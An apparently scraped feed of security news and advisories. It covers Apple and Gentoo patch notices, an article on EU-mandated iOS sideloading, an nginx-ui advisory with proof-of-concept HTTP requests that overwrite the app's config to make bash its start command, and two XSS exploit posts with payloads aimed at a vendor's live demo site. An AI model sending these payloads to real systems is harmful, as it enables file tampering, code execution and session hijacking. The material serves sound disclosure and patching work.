The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a high-severity flaw impacting iOS, iPadOS, macOS, tvOS, and watchOS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerability, tracked as CVE-2022-48618 (CVSS score: 7.8), concerns a bug in the kernel component.
"An attacker with

Vulnerability / Software Update

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a high-severity flaw impacting iOS, iPadOS, macOS, tvOS, and watchOS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The vulnerability, tracked as CVE-2022-48618 (CVSS score: 7.8), concerns a bug in the kernel component.

"An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication," Apple said in an advisory, adding the issue "may have been exploited against versions of iOS released before iOS 15.7.1."

The iPhone maker said the problem was addressed with improved checks. It's currently not known how the vulnerability is being weaponized in real-world attacks.

Interestingly, patches for the flaw were released on December 13, 2022 with the release of iOS 16.2, iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2, and watchOS 9.2, although it was only publicly disclosed more than a year later on January 9, 2024.

It's worth noting that Apple did resolve a similar flaw in the kernel (CVE-2022-32844, CVSS score: 6.3) in iOS 15.6 and iPadOS 15.6, which was shipped on July 20, 2022.

"An app with arbitrary kernel read and write capability may be able to bypass Pointer Authentication," the company said at the time. "A logic issue was addressed with improved state management."

In light of the active exploitation of CVE-2022-48618, CISA is recommending that Federal Civilian Executive Branch (FCEB) agencies apply the fixes by February 21, 2024.

The development also comes as Apple expanded patches for an actively exploited security flaw in the WebKit browser engine (CVE-2024-23222, CVSS score: 8.8) to include its Apple Vision Pro headset. The fix is available in visionOS 1.0.2.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of Active Exploitation of Critical Flaws in Apple iOS and macOS

Gentoo Linux Security Advisory 202401-33 - Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to remote code execution. Versions greater than or equal to 2.42.2:4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-33  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: WebKitGTK+: Multiple Vulnerabilities  
     Date: January 31, 2024  
     Bugs: #915222, #918667  
       ID: 202401-33

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in WebKitGTK+, the worst of  
which may lead to remote code execution.

Background  
==========

WebKitGTK+ is a full-featured port of the WebKit rendering engine,  
suitable for projects requiring any kind of web integration, from hybrid  
HTML/CSS applications to full-fledged web browsers.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  -------------  
net-libs/webkit-gtk  < 2.42.2:4    >= 2.42.2:4  
                     < 2.42.2:4.1  >= 2.42.2:4.1  
                     < 2.42.2:6    >= 2.42.2:6

Description  
===========

Multiple vulnerabilities have been discovered in WebKitGTK+. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All WebKitGTK+ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.42.2"

References  
==========

[ 1 ] CVE-2023-32359  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32359  
[ 2 ] CVE-2023-35074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35074  
[ 3 ] CVE-2023-39434  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39434  
[ 4 ] CVE-2023-39928  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39928  
[ 5 ] CVE-2023-40451  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40451  
[ 6 ] CVE-2023-41074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41074  
[ 7 ] CVE-2023-41983  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41983  
[ 8 ] CVE-2023-41993  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41993  
[ 9 ] CVE-2023-42852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42852  
[ 10 ] CVE-2023-42890  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42890  
[ 11 ] WSA-2023-0009  
      https://webkitgtk.org/security/WSA-2023-0009.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-33

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-33

To comply with the EU's Digital Markets Act, Apple will allow European iPhone owners to install apps obtained from outside the official App store.

Despite several warnings about the risks, Apple will allow European iPhone owners to install apps obtained from outside the official App store (sideloading).

These drastic changes are brought about to comply with the European Union’s (EU) Digital Markets Act (DMA). The Digital Markets Act (DMA) establishes a set of clearly defined objective criteria to identify “gatekeepers”. Gatekeepers are large digital platforms providing so called core platform services, such as for example online search engines, app stores, and messenger services.

The Digital Markets Act aims to regulate the gatekeeper power of the largest digital companies. The EU designated iOS, Safari, and the App Store as “core platform services” under the Digital Markets Act. According to the DMA, Apple as it is now has a monopoly in the App Store, and will no longer be allowed to use that to enforce a monopoly in payments in apps.

For reference, something similar happened when the US accused Microsoft of illegally monopolizing the web browser market for Windows. A few law cases later they reached a settlement in which Microsoft agreed to modify some of its business practices, opening up the opportunity for Windows users to switch to other browsers.

The Apple Newsroom says:

> “The changes include more than 600 new APIs, expanded app analytics, functionality for alternative browser engines, and options for processing app payments and distributing iOS apps.”

But Apple also warns very firmly about the consequences.

> “The new options for processing payments and downloading apps on iOS open new avenues for malware, fraud and scams, illicit and harmful content, and other privacy and security threats.”

Another big change is that web browsers won’t be forced to use Safari’s WebKit engine, opening the space for Chromium based browsers and a more desktop-alike feel for Firefox.

The fact that Apple only allows other browsers to drop WebKit in Europe means that browser developers are forced to make hard choices. Mozilla spokesperson Damiano DeMonte tells The Verge it’s extremely disappointed with the way things turned out.

> “We are still reviewing the technical details but are extremely disappointed with Apple’s proposed plan to restrict the newly-announced BrowserEngineKit to EU-specific apps. The effect of this would be to force an independent browser like Firefox to build and maintain two separate browser implementations — a burden Apple themselves will not have to bear.”

We asked Malwarebytes Director of Core Technology and resident Apple expert Thomas Reed how he felt about the announced changes and the associated risks.

Thomas is waiting for more details as well, but he expects that Apple will use the experience it gathered with macOS by nature of its openness and only open it up only as much as it is forced to, and no more. Thomas expects Apple to impose notarization on iOS apps from outside the App Store, just as they did for macOS.

> “If they completely open up iOS to the same degree as macOS, I think there will be some inevitable malware, adware, and PUP issues. The biggest problem with iOS currently is PUPs and scam apps that manage to get past the review process. I think those will also be a problem with apps from outside the App Store, and I think Apple will combat those similarly. Which is to say, far from perfectly.”

Developers can get acquainted with these changes on the Apple Developer Support page and start testing new capabilities in the iOS 17.4 beta. The new capabilities will become available to users in the 27 EU countries around the beginning of March 2024.

Don’t rely on the fact that this will be limited to the EU. Although the most significant app policy changes apply only to EU countries, other shifts concerning cloud gaming and in-app purchases will take effect worldwide.

**We don’t just report on iOS security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your iOS devices by downloading Malwarebytes for iOS today.

 Apple warns of &#8220;privacy and security threats&#8221; after EU requires it to allow sideloading 

### Summary

The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.

https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72

```
func AddCert(c *gin.Context) {
	var json struct {
		Name                  string `json:"name"`
		SSLCertificatePath    string `json:"ssl_certificate_path" binding:"required"`
		SSLCertificateKeyPath string `json:"ssl_certificate_key_path" binding:"required"`
		SSLCertificate        string `json:"ssl_certificate"`
		SSLCertificateKey     string `json:"ssl_certificate_key"`
		ChallengeMethod       string `json:"challenge_method"`
		DnsCredentialID       int    `json:"dns_credential_id"`
	}
	if !api.BindAndValid(c, &json) {
		return
	}
	certModel := &model.Cert{
		Name:                  json.Name,
		SSLCertificatePath:    json.SSLCertificatePath,
		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
		ChallengeMethod:       json.ChallengeMethod,
		DnsCredentialID:       json.DnsCredentialID,
	}

	err := certModel.Insert()

	if err != nil {
		api.ErrHandler(c, err)
		return
	}

	content := &cert.Content{
		SSLCertificatePath:    json.SSLCertificatePath,
		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
		SSLCertificate:        json.SSLCertificate,
		SSLCertificateKey:     json.SSLCertificateKey,
	}

	err = content.WriteFile()

	if err != nil {
		api.ErrHandler(c, err)
		return
	}

	c.JSON(http.StatusOK, Transformer(certModel))
}

```
https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15

```
func (c *Content) WriteFile() (err error) {
	// MkdirAll creates a directory named path, along with any necessary parents,
	// and returns nil, or else returns an error.
	// The permission bits perm (before umask) are used for all directories that MkdirAll creates.
	// If path is already a directory, MkdirAll does nothing and returns nil.

	err = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)
	if err != nil {
		return
	}

	err = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)
	if err != nil {
		return
	}

	if c.SSLCertificate != "" {
		err = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)
		if err != nil {
			return
		}
	}

	if c.SSLCertificateKey != "" {
		err = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)
		if err != nil {
			return
		}
	}

	return
}
```


### PoC

```
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 144
Accept: application/json, text/plain, */*
Authorization: <JWT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
Connection: close

{"name":"poc","ssl_certificate_path":"/tmp/test","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"test","ssl_certificate_key":"test2"}
```

```
root@aze:~/nginx# ls -la /tmp/test*
-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test
-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2
```

It's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.

```
root@aze:~/nginx# cat app.ini  | grep "StartCmd"
StartCmd          = login
```
Then we overwrite the `StartCmd` with `bash`

```
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 980
Accept: application/json, text/plain, */*
Authorization: <JWT>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
Connection: close

{"name":"poc","ssl_certificate_path":"/root/nginx/app.ini","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"[server]\r\nHttpHost          = 0.0.0.0\r\nHttpPort          = 9000\r\nRunMode           = debug\r\nJwtSecret         = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\r\nNodeSecret        = 139ab224-9e9e-444f-987e-b3a651175ad5\r\nHTTPChallengePort = 9180\r\nEmail             = props@pros.com\r\nDatabase          = database\r\nStartCmd          = bash\r\nCADir             = dqsdqsd\r\nDemo              = false\r\nPageSize          = 10\r\nGithubProxy       = dqsdqfsdfsdfsdfsd\r\n\r\n[nginx]\r\nAccessLogPath =\r\nErrorLogPath  =\r\nConfigDir     =\r\nPIDPath       =\r\nTestConfigCmd =\r\nReloadCmd     =\r\nRestartCmd    =\r\n\r\n[openai]\r\nBaseUrl = \r\nToken   =\r\nProxy   =\r\nModel   = \r\n\r\n[casdoor]\r\nEndpoint     =\r\nClientId     =\r\nClientSecret =\r\nCertificate  =\r\nOrganization =\r\nApplication  =\r\nRedirectUri  =","ssl_certificate_key":"test2"}
```

```
root@aze:~/nginx# cat app.ini  | grep "StartCmd"
StartCmd          = bash
```

For the new config to be applied the app needs to be restarted

![image](https://user-images.githubusercontent.com/26652608/299331664-6415a8c1-6611-4e53-8137-3e574c58da28.png)



### Impact

Arbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.

**Summary**

The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.

https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72

    func AddCert(c *gin.Context) {
    	var json struct {
    		Name                  string `json:"name"`
    		SSLCertificatePath    string `json:"ssl_certificate_path" binding:"required"`
    		SSLCertificateKeyPath string `json:"ssl_certificate_key_path" binding:"required"`
    		SSLCertificate        string `json:"ssl_certificate"`
    		SSLCertificateKey     string `json:"ssl_certificate_key"`
    		ChallengeMethod       string `json:"challenge_method"`
    		DnsCredentialID       int    `json:"dns_credential_id"`
    	}
    	if !api.BindAndValid(c, &json) {
    		return
    	}
    	certModel := &model.Cert{
    		Name:                  json.Name,
    		SSLCertificatePath:    json.SSLCertificatePath,
    		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
    		ChallengeMethod:       json.ChallengeMethod,
    		DnsCredentialID:       json.DnsCredentialID,
    	}
    
    	err := certModel.Insert()
    
    	if err != nil {
    		api.ErrHandler(c, err)
    		return
    	}
    
    	content := &cert.Content{
    		SSLCertificatePath:    json.SSLCertificatePath,
    		SSLCertificateKeyPath: json.SSLCertificateKeyPath,
    		SSLCertificate:        json.SSLCertificate,
    		SSLCertificateKey:     json.SSLCertificateKey,
    	}
    
    	err = content.WriteFile()
    
    	if err != nil {
    		api.ErrHandler(c, err)
    		return
    	}
    
    	c.JSON(http.StatusOK, Transformer(certModel))
    }
    
    

https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write\_file.go#L15

    func (c *Content) WriteFile() (err error) {
    	// MkdirAll creates a directory named path, along with any necessary parents,
    	// and returns nil, or else returns an error.
    	// The permission bits perm (before umask) are used for all directories that MkdirAll creates.
    	// If path is already a directory, MkdirAll does nothing and returns nil.
    
    	err = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)
    	if err != nil {
    		return
    	}
    
    	err = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)
    	if err != nil {
    		return
    	}
    
    	if c.SSLCertificate != "" {
    		err = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)
    		if err != nil {
    			return
    		}
    	}
    
    	if c.SSLCertificateKey != "" {
    		err = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)
    		if err != nil {
    			return
    		}
    	}
    
    	return
    }
    

**PoC**

    POST /api/cert HTTP/1.1
    Host: 127.0.0.1:9000
    Content-Length: 144
    Accept: application/json, text/plain, */*
    Authorization: <JWT>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Content-Type: application/json
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
    Connection: close
    
    {"name":"poc","ssl_certificate_path":"/tmp/test","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"test","ssl_certificate_key":"test2"}
    

    root@aze:~/nginx# ls -la /tmp/test*
    -rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test
    -rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2
    

It's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.

    root@aze:~/nginx# cat app.ini  | grep "StartCmd"
    StartCmd          = login
    

Then we overwrite the StartCmd with bash

    POST /api/cert HTTP/1.1
    Host: 127.0.0.1:9000
    Content-Length: 980
    Accept: application/json, text/plain, */*
    Authorization: <JWT>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Content-Type: application/json
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7
    Connection: close
    
    {"name":"poc","ssl_certificate_path":"/root/nginx/app.ini","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"[server]\r\nHttpHost          = 0.0.0.0\r\nHttpPort          = 9000\r\nRunMode           = debug\r\nJwtSecret         = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\r\nNodeSecret        = 139ab224-9e9e-444f-987e-b3a651175ad5\r\nHTTPChallengePort = 9180\r\nEmail             = props@pros.com\r\nDatabase          = database\r\nStartCmd          = bash\r\nCADir             = dqsdqsd\r\nDemo              = false\r\nPageSize          = 10\r\nGithubProxy       = dqsdqfsdfsdfsdfsd\r\n\r\n[nginx]\r\nAccessLogPath =\r\nErrorLogPath  =\r\nConfigDir     =\r\nPIDPath       =\r\nTestConfigCmd =\r\nReloadCmd     =\r\nRestartCmd    =\r\n\r\n[openai]\r\nBaseUrl = \r\nToken   =\r\nProxy   =\r\nModel   = \r\n\r\n[casdoor]\r\nEndpoint     =\r\nClientId     =\r\nClientSecret =\r\nCertificate  =\r\nOrganization =\r\nApplication  =\r\nRedirectUri  =","ssl_certificate_key":"test2"}
    

    root@aze:~/nginx# cat app.ini  | grep "StartCmd"
    StartCmd          = bash
    

For the new config to be applied the app needs to be restarted

**Impact**

Arbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.

**References**

*   GHSA-xvq9-4vpv-227m
*   https://nvd.nist.gov/vuln/detail/CVE-2024-23827
*   0xJacky/nginx-ui@8581bdd
*   https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72
*   https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write\_file.go#L15

GHSA-xvq9-4vpv-227m: Nginx-UI vulnerable to arbitrary file write through the Import Certificate feature

Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

Apple Security Advisory 01-22-2024-9 - tvOS 17.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-9 tvOS 17.3

tvOS 17.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214055.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

NSSpellChecker  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

TCC  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDyQACgkQX+5d1TXa  
IvoUsA//bw9u1+Jxh79G7jV7SXt8HRV8yqr16Bhq00AqSdDx/RgVGTUs6cN8OfGX  
MVda91yeQS7WOEtrw7no8vD2HcGSvcTCRWTRQRSYJjZfZ4C3v9Rnt3Nlx/mvdLQg  
50Kn3Gm46C/+iFhuZhtSa9VrDhoaiLs3Wb9nVBrQ917CyNMXeDb1JuP1MOjPJgiJ  
IVZlcIwAFrx4f779ove/MtupyeeoHZwV1KICEDyVIZsUGMGf4ti6J8tdK73EmUPo  
a1Q6pRx8JRwtXBPkp/1PerRsfzb9bRAksZU6R5d8RdJBTpnx9kfZZpPWknyRX2R9  
gR6tJrswgHcalkHDL6UXJfnWS3XCrCHg2jKQbWPDvor6juOMUKfi40ww36H6KdRG  
ksNdFaWhmSK0Qu1EqS4bmCWYiUx16O/js7tbbNfXFp+ssjMtjunlVs9Ly3Jh2Fpi  
gry4IRE5Ll4oryFxUPV9KGM72eDL8PAwvIgDXx5/NkcrZIGZNl9eseJCsfZ/AV7Z  
dZTcc78Yguenm5Nsot6GmL1q0+LCj48PmcFu6VQF7KSFWcehAKjVIk+DaAOJITgF  
uJekaVJp3mVe5XRvtQrfMlegiog40gPxQgwJ/psUyp3Ss5uIOPF6EUrAj2xqERRc  
GVDDKWA3BFSCOJD/dtR/xmiwJdRMQwomeo8k1uUpd96ICM6VgJM=  
=HfBk  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-9

Apple Security Advisory 01-22-2024-8 - watchOS 10.3 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-8 watchOS 10.3

watchOS 10.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214060.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: Apple Watch Series 4 and later  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

Mail Search  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSSpellChecker  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari  
Available for: Apple Watch Series 4 and later  
Impact: A user's private browsing activity may be visible in Settings  
Description: A privacy issue was addressed with improved handling of  
user preferences.  
CVE-2024-23211: Mark Bowers

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
